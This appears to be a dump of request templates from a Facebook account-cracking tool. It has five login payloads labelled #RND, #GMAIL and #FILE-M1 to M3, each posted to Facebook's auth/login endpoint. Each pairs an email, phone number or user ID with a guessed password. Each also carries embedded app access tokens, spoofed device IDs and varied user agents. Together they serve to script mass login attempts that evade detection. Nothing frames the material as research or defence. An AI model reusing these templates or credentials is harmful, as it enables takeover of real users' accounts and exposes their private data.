#RND
{'adid': 'c3c6abbb-1ace-4ccf-b496-d4aa2448cfc0', 'format': 'json', 'device_id': '3c5b1293-cc72-4440-8c30-bafb89ed8208', 'email': '03383589794', 'password': '3589794', 'generate_analytics_claims': '1', 'cpl': 'true', 'try_num': '1', 'family_device_id': 'fe634886-6205-416f-bb28-c54a2579de2d', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'fb_api_req_friendly_name': 'authenticate', 'api_key': '62f8ce9f74b12f84c123cc23437a4a32', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'}
{'User-Agent': 'Mozilla/5.0 (Linux; Android 8.0; Sony Xperia XZ3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6367.92 Mobile Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Friendly-Name': 'authenticate', 'X-FB-Connection-Bandwidth': '30848', 'X-FB-Net-HNI': '20633', 'X-FB-SIM-HNI': '26982', 'X-FB-Connection-Type': 'WIFI', 'Content-Type': 'application/x-www-form-urlencoded', 'X-FB-HTTP-Engine': 'true', 'Content-Length': '603'}
https://b-graph.facebook.com/auth/login
#GMAIL
{'adid': '00560737-0224-4a4c-a32a-bdb1f8fe11fb', 'format': 'json', 'device_id': 'cfc04ec6-02bf-48ac-b45a-9de6cc673f8f', 'email': 'akingmgo6343@gmail.com', 'password': 'aking12', 'generate_analytics_claims': '1', 'cpl': 'true', 'try_num': '1', 'family_device_id': '40f9664e-6f75-4043-8c90-b53587824f0b', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'fb_api_req_friendly_name': 'authenticate', 'api_key': '62f8ce9f74b12f84c123cc23437a4a32', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'}
{'User-Agent': 'Mozilla/5.0 (Linux; Android 12; OnePlus 10 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.121 Mobile Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Friendly-Name': 'authenticate', 'X-FB-Connection-Bandwidth': '23829', 'X-FB-Net-HNI': '31189', 'X-FB-SIM-HNI': '22769', 'X-FB-Connection-Type': 'MOBILE.LTE', 'Content-Type': 'application/x-www-form-urlencoded', 'X-FB-HTTP-Engine': 'true', 'Content-Length': '617'}
https://b-graph.facebook.com/auth/login
#FILE-M1
{'adid': '10afb667-3d6d-46c9-8bdd-8376d3560a9f', 'format': 'json', 'device_id': '7282ad8c-809b-4df0-b2f1-ad7937be3f85', 'cpl': 'true', 'family_device_id': '683cc2b9-fe51-40c8-b0cc-ca04814d78eb', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '100001410008852', 'password': 'fuehd', 'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'advertiser_id': 'e0270e0c-bb40-470a-8abe-ae29d7200cd8', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'Mozilla/5.0 (Linux; Android 11; SM-A315F) [FBAN/FB4A;FBAV/448.0.0.34.116;FBBV/632345123;FBDM/{density=2.0,width=720,height=1600};FBLC/en_GB;FBRV/632345123;FBCR/Jazz;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-A315F;FBSV/11;FBOP/1;FBCA/arm64-v8a:;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '38269', 'X-FB-SIM-HNI': '20747', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '702'}
https://graph.facebook.com/auth/login
#FILE-M2
{'adid': 'a4e038bc-b5ec-4f76-bff5-f8bcf7ebf275', 'format': 'json', 'device_id': 'da017c26-b54c-4d79-99c0-c1fa50e5c9a4', 'cpl': 'true', 'family_device_id': 'ee76cac3-82fa-454a-b387-b9a1a981f3a3', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61578699631717', 'password': 'udu', 'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'advertiser_id': 'c7aca559-3d50-406b-b870-8ab59f8afc40', 'currently_logged_in_userid': '0', 'locale': 'en_US', 'client_country_code': 'US', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.4 Mobile/15E148 Safari/604.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '37959', 'X-FB-SIM-HNI': '37836', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '699'}
https://graph.facebook.com/auth/login
#FILE-M3
{'adid': 'c086f6d5-a63b-44b0-92ed-e368ce98ccdc', 'format': 'json', 'device_id': '74d77d1f-e66a-4441-9995-a3f88005f262', 'cpl': 'true', 'family_device_id': 'ba94f4de-e02a-444b-925c-ac034ac01ae5', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61578613655097', 'password': 'hdhd', 'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'advertiser_id': '182f0071-16c1-462d-a982-f45fcb213b57', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '27760', 'X-FB-SIM-HNI': '34540', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '700'}
https://b-graph.facebook.com/auth/login